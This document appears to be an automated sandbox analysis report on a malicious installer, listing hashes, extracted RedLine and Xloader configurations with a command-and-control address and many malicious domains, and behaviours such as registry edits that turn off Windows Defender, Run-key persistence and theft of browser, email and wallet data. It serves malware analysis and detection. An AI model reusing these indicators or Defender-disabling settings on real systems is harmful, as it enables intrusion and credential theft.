Resubmissions
01-11-2021 20:09
211101-yw5kbaafg5 1001-11-2021 07:13
211101-h2lrdsdhhj 1001-11-2021 06:40
211101-hfpk6adhfj 1031-10-2021 18:27
211031-w3r7fsdafj 1031-10-2021 14:10
211031-rgstmscghm 1031-10-2021 08:02
211031-jxchlacefm 1031-10-2021 06:36
211031-hczxqacddp 1031-10-2021 06:23
211031-g5wv4affb3 10Analysis
-
max time kernel
4650s -
max time network
10811s -
platform
windows11_x64 -
resource
win11 -
submitted
01-11-2021 06:40
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.5MB
-
MD5
3da25ccfa9c258e3ae26854391531c7b
-
SHA1
1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
-
SHA256
62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
-
SHA512
defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c
Malware Config
Extracted
redline
srtupdate33
135.181.129.119:4805
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Signatures
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1412 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7928 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5288 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6848 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7788 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7148 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 11664 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 11704 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 46116 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9260 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5628 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 31800 4936 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/1064-302-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral3/memory/1064-299-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03d477f1a31.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03d477f1a31.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 45 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeschtasks.exesvchost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 3984 created 6140 3984 WerFault.exe rundll32.exe PID 2124 created 4064 2124 WerFault.exe Sun03d477f1a31.exe PID 1072 created 3324 1072 WerFault.exe Sun033e271e0ce96c08.exe PID 6900 created 3612 6900 WerFault.exe Sun0324aba28588c0.exe PID 6552 created 4600 6552 schtasks.exe Sun03e4aeb7e43a1c.exe PID 5164 created 6020 5164 svchost.exe 4.exe PID 920 created 1560 920 WerFault.exe VaQQKPf9T577ZPDm1uawzRQO.exe PID 2340 created 4708 2340 WerFault.exe hgmCgKLLp6_aBM_p6OXdxhM4.exe PID 5320 created 4872 5320 WerFault.exe WerFault.exe PID 1308 created 5872 1308 WerFault.exe aAXlLwdC9UKnsWc8aTXy3Ptd.exe PID 5664 created 5684 5664 WerFault.exe EBU0gvgBJleOPWdQsXtPukc0.exe PID 5304 created 5124 5304 cmd.exe cmd.exe PID 5804 created 8064 5804 WerFault.exe rundll32.exe PID 6216 created 3956 6216 WerFault.exe cmd.exe PID 6136 created 4040 6136 bifurcation.exe PID 4216 created 1900 4216 WerFault.exe 6.exe PID 4432 created 7392 4432 WerFault.exe WerFault.exe PID 6032 created 7548 6032 WerFault.exe 2CBMfkvtUogf9hzCi_qA7oap.exe PID 2352 created 7636 2352 WerFault.exe hhdys4K7UWyFNobqt4GlqiEh.exe PID 7392 created 6952 7392 WerFault.exe rundll32.exe PID 3900 created 5392 3900 WerFault.exe rundll32.exe PID 7796 created 7068 7796 WerFault.exe 3176.exe PID 1500 created 2584 1500 WerFault.exe 1asWT9_23sWIkWvXBfuAHztv.exe PID 5948 created 6228 5948 WerFault.exe 6A4B.exe PID 3324 created 7744 3324 WerFault.exe RUc12BIkVlXMFW5crVQpYnzm.exe PID 4872 created 4228 4872 WerFault.exe DB08.exe PID 1428 created 5280 1428 WerFault.exe beadroll.exe PID 3040 created 6084 3040 WerFault.exe 6A96.exe PID 6712 created 6252 6712 WerFault.exe 7AD5.exe PID 4872 created 8176 4872 WerFault.exe WerFault.exe PID 8032 created 3720 8032 WerFault.exe C866.exe PID 5528 created 5624 5528 WerFault.exe GcleanerEU.exe PID 1052 created 3724 1052 WerFault.exe rundll32.exe PID 7696 created 30840 7696 WerFault.exe GcleanerEU.exe PID 9024 created 31180 9024 WerFault.exe gcleaner.exe PID 8924 created 8252 8924 WerFault.exe rundll32.exe PID 10128 created 50108 10128 WerFault.exe gcleaner.exe PID 10056 created 49716 10056 WerFault.exe GcleanerEU.exe PID 11340 created 7800 11340 WerFault.exe GcleanerEU.exe PID 31816 created 11692 31816 WerFault.exe rundll32.exe PID 31872 created 31788 31872 WerFault.exe rundll32.exe PID 32200 created 8984 32200 WerFault.exe gcleaner.exe PID 32388 created 9416 32388 WerFault.exe gcleaner.exe PID 16968 created 15296 16968 WerFault.exe fontdrvhost.exe PID 49492 created 48612 49492 WerFault.exe GcleanerEU.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
svchost.exepowershell.exepowershell.exedescription pid process target process PID 6244 created 5528 6244 svchost.exe AdvancedRun.exe PID 6244 created 5528 6244 svchost.exe AdvancedRun.exe PID 6244 created 3792 6244 svchost.exe taskkill.exe PID 6244 created 3792 6244 svchost.exe taskkill.exe PID 6244 created 3436 6244 svchost.exe msedge.exe PID 6244 created 3436 6244 svchost.exe msedge.exe PID 6244 created 7632 6244 svchost.exe AdvancedRun.exe PID 6244 created 7632 6244 svchost.exe AdvancedRun.exe PID 15060 created 17420 15060 powershell.exe TrustedInstaller.exe PID 15152 created 17420 15152 powershell.exe TrustedInstaller.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/3940-476-0x0000000002FA0000-0x0000000002FC9000-memory.dmp xloader behavioral3/memory/5312-489-0x0000000000380000-0x00000000003A9000-memory.dmp xloader -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libcurlpp.dll aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
control.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run control.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\NPRPDXW = "C:\\Program Files (x86)\\Mrbnhc\\xfatghhxptwtr.exe" control.exe -
Blocklisted process makes network request 8 IoCs
Processes:
mshta.exeMsiExec.exeflow pid process 151 3652 mshta.exe 153 3652 mshta.exe 935 31772 MsiExec.exe 939 31772 MsiExec.exe 951 31772 MsiExec.exe 953 31772 MsiExec.exe 962 31772 MsiExec.exe 989 31772 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
Processes:
ShareFolder.exeShareFolder.exeShareFolder.exeShareFolder.exeHamivapasi.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Hamivapasi.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSun03d477f1a31.exeSun039750b00c.exeSun033e271e0ce96c08.exeSun03e4aeb7e43a1c.exeSun0324aba28588c0.exeSun0397381f1f458e.exeSun03f0dc4460bc9.exeSun038aa349e3318e.exeSun038db98f99bf9a.exeSun0328255c4bce6fb.exeSun03ea09aa5c9686e5.exeSun03f5d51697d04.exeSun0351a0558292.exeSun03f5d51697d04.tmpSun0397381f1f458e.exeSun03f5d51697d04.execolorcpl.exewXE1XgqZIR_W9IM.exESun03f0dc4460bc9.exe1907429.exetv3K6hSK60TEWOTPIZxPD0z1.exeqQbVMM4g0bpXElDCk7u81Gef.exeLzmwAqmV.exe6722478.exeChrome5.exe3782043.exeDownFlSetup110.exedyEvj3hC2t7OMuwoWXdKUmK3.exenuv3nTIlFEYBrkPp1N3C1htI.exehgmCgKLLp6_aBM_p6OXdxhM4.exe9Zb2WtRSw11ACQNzk2XLqI6n.exeF37OFtk5v9UdORoY8t4Donzo.exe46puvSQnm9v3JLD7WOWMRWFL.exeZP0MR34BkzoGGsDYhHusS489.exe024wC3SO_qVtbE4Y9Lz5RQz9.exeEBU0gvgBJleOPWdQsXtPukc0.exeVaQQKPf9T577ZPDm1uawzRQO.exeFvMCEwri6_qByE_3M8DbslRU.exeZx0htBgAf3gZhfn9rCPnpedY.exemXtIGk3ofwNa4d7r1RCLpLFz.exeK0TibwmFldhZ549RofY1erc4.exeaAXlLwdC9UKnsWc8aTXy3Ptd.exeVM2skHGFpeBDBysR6622fBC8.exesvchost.exeS7koKpK33vLWjAxi5chFkuJ9.exenxfL7_6XSgUfDUVDEan06Mbe.exeHj5Pq1vV39n8G1DTpop2wdl2.exepostback.exe4844256.execmd.exejg1_1faf.exenXZzPjm8z9HP4_SUYbwTPDKm.exeB2zEVweKaLRoMVSBnxG2zIKP.executm3.exe4990988.exeSoft1WW01.exeM35Lp9gfDfkC86gCoe6z36z0.exe4kw4eKu9gndEHqJKFw6yErfF.exetaskkill.exeAdvancedRun.exe4.exe4kw4eKu9gndEHqJKFw6yErfF.tmppid process 2172 setup_installer.exe 5056 setup_install.exe 4064 Sun03d477f1a31.exe 4088 Sun039750b00c.exe 3324 Sun033e271e0ce96c08.exe 4600 Sun03e4aeb7e43a1c.exe 3612 Sun0324aba28588c0.exe 3304 Sun0397381f1f458e.exe 4708 Sun03f0dc4460bc9.exe 2900 Sun038aa349e3318e.exe 1456 Sun038db98f99bf9a.exe 3652 Sun0328255c4bce6fb.exe 812 Sun03ea09aa5c9686e5.exe 2132 Sun03f5d51697d04.exe 3132 Sun0351a0558292.exe 3504 Sun03f5d51697d04.tmp 2944 Sun0397381f1f458e.exe 5192 Sun03f5d51697d04.exe 5312 colorcpl.exe 5384 wXE1XgqZIR_W9IM.exE 1064 Sun03f0dc4460bc9.exe 5580 1907429.exe 5772 tv3K6hSK60TEWOTPIZxPD0z1.exe 5816 qQbVMM4g0bpXElDCk7u81Gef.exe 5800 LzmwAqmV.exe 5924 6722478.exe 4944 Chrome5.exe 4264 3782043.exe 5396 DownFlSetup110.exe 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe 3392 nuv3nTIlFEYBrkPp1N3C1htI.exe 4708 hgmCgKLLp6_aBM_p6OXdxhM4.exe 5848 9Zb2WtRSw11ACQNzk2XLqI6n.exe 5920 F37OFtk5v9UdORoY8t4Donzo.exe 5808 46puvSQnm9v3JLD7WOWMRWFL.exe 5724 ZP0MR34BkzoGGsDYhHusS489.exe 5612 024wC3SO_qVtbE4Y9Lz5RQz9.exe 5684 EBU0gvgBJleOPWdQsXtPukc0.exe 1560 VaQQKPf9T577ZPDm1uawzRQO.exe 4872 FvMCEwri6_qByE_3M8DbslRU.exe 5472 Zx0htBgAf3gZhfn9rCPnpedY.exe 5064 mXtIGk3ofwNa4d7r1RCLpLFz.exe 5124 K0TibwmFldhZ549RofY1erc4.exe 5872 aAXlLwdC9UKnsWc8aTXy3Ptd.exe 6040 VM2skHGFpeBDBysR6622fBC8.exe 5164 svchost.exe 5256 S7koKpK33vLWjAxi5chFkuJ9.exe 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe 1652 postback.exe 852 4844256.exe 1512 cmd.exe 1232 jg1_1faf.exe 496 nXZzPjm8z9HP4_SUYbwTPDKm.exe 1616 B2zEVweKaLRoMVSBnxG2zIKP.exe 3224 cutm3.exe 5864 4990988.exe 3956 Soft1WW01.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 5740 4kw4eKu9gndEHqJKFw6yErfF.exe 3792 taskkill.exe 5528 AdvancedRun.exe 6020 4.exe 6176 4kw4eKu9gndEHqJKFw6yErfF.tmp -
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
F37OFtk5v9UdORoY8t4Donzo.exeS7koKpK33vLWjAxi5chFkuJ9.exe4844256.exe3176.exeVM2skHGFpeBDBysR6622fBC8.exe3782043.exe6722478.exe9Zb2WtRSw11ACQNzk2XLqI6n.exe1959615.exe997740.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F37OFtk5v9UdORoY8t4Donzo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion S7koKpK33vLWjAxi5chFkuJ9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4844256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3176.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VM2skHGFpeBDBysR6622fBC8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3782043.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6722478.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F37OFtk5v9UdORoY8t4Donzo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4844256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9Zb2WtRSw11ACQNzk2XLqI6n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9Zb2WtRSw11ACQNzk2XLqI6n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1959615.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VM2skHGFpeBDBysR6622fBC8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6722478.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion S7koKpK33vLWjAxi5chFkuJ9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 997740.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 997740.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3176.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1959615.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3782043.exe -
Drops startup file 3 IoCs
Processes:
46puvSQnm9v3JLD7WOWMRWFL.exeQUKHyXjH3qRKVkqx.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe 46puvSQnm9v3JLD7WOWMRWFL.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe 46puvSQnm9v3JLD7WOWMRWFL.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QUKHyXjH3qRKVkqx.vbs QUKHyXjH3qRKVkqx.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeSun03f5d51697d04.tmpcolorcpl.exerundll32.exeM35Lp9gfDfkC86gCoe6z36z0.exe4kw4eKu9gndEHqJKFw6yErfF.tmpmsiexec.exeCalculator Installation.exerundll32.exeQa0ydjRf2tdAW_WXEvJN1dhr.tmpmSbGRGi7Yiq04OsOdmXbOJGl.tmps8SU1s3eNIwgJA57Ks5cMfdE.exeLvP2JR61i9foyFZ2pnR1CRLZ.tmpGVCbJgN4fvZ0RwrZvawYRPZB.tmpFVFTOIzhXOwuCYMlRx7WbAzn.exesetup.exesetup.exesetup.exeregsvr32.exerundll32.exerundll32.exemsiexec.exemsiexec.exeinstaller.exeMsiExec.exerundll32.exerundll32.exeCalculator.exepid process 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 3504 Sun03f5d51697d04.tmp 5312 colorcpl.exe 6140 rundll32.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 6176 4kw4eKu9gndEHqJKFw6yErfF.tmp 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 3924 msiexec.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 5812 Calculator Installation.exe 5812 Calculator Installation.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 5812 Calculator Installation.exe 5812 Calculator Installation.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 5812 Calculator Installation.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 8064 rundll32.exe 8028 Qa0ydjRf2tdAW_WXEvJN1dhr.tmp 8052 mSbGRGi7Yiq04OsOdmXbOJGl.tmp 2004 s8SU1s3eNIwgJA57Ks5cMfdE.exe 2004 s8SU1s3eNIwgJA57Ks5cMfdE.exe 3584 LvP2JR61i9foyFZ2pnR1CRLZ.tmp 7456 GVCbJgN4fvZ0RwrZvawYRPZB.tmp 7312 FVFTOIzhXOwuCYMlRx7WbAzn.exe 7312 FVFTOIzhXOwuCYMlRx7WbAzn.exe 2004 s8SU1s3eNIwgJA57Ks5cMfdE.exe 7312 FVFTOIzhXOwuCYMlRx7WbAzn.exe 1604 setup.exe 1604 setup.exe 7296 setup.exe 7296 setup.exe 6472 setup.exe 6472 setup.exe 6768 regsvr32.exe 6952 rundll32.exe 5392 rundll32.exe 6756 msiexec.exe 6756 msiexec.exe 7776 msiexec.exe 7776 msiexec.exe 33668 installer.exe 33668 installer.exe 33668 installer.exe 47000 MsiExec.exe 47000 MsiExec.exe 3724 rundll32.exe 8252 rundll32.exe 1604 setup.exe 1604 setup.exe 11140 Calculator.exe 6472 setup.exe 1604 setup.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
46puvSQnm9v3JLD7WOWMRWFL.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Documents\03B82AA2\svchost.exe = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 46puvSQnm9v3JLD7WOWMRWFL.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
WindowsUpdate.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts WindowsUpdate.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 18 IoCs
Processes:
46puvSQnm9v3JLD7WOWMRWFL.exesetup.exesetup.exesetup.exeHamivapasi.exe8CD8CA21.exeShareFolder.exeRuntimeBroker.exe1462013.exemsedge.exeQUKHyXjH3qRKVkqx.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\8CD8CA21 = "C:\\Users\\Public\\Documents\\03B82AA2\\svchost.exe" 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Gaexiwawisi.exe\"" Hamivapasi.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\8CD8CA21 = "C:\\Users\\Public\\Documents\\03B82AA2\\svchost.exe" 8CD8CA21.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows NT\\ZHuqoshybila.exe\"" ShareFolder.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe䈀" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1462013.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe쌀" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe耀" RuntimeBroker.exe Key created 